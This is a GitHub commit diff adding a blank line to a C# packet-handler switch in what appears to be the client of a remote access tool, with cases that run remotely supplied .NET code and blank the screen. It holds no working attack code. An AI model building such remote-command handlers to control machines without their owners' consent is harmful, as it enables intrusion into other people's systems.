Fixed formating

This commit is contained in:
MrDevBot 2019-06-17 14:17:06 +10:00 committed by GitHub
parent 321601a704
commit fd4d1e4ff0
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -297,6 +297,7 @@ namespace Client.Handle_Packet
new HandlerExecuteDotNetCode(unpack_msgpack);
break;
}
case "blankscreen":
{
new HandleBlankScreen();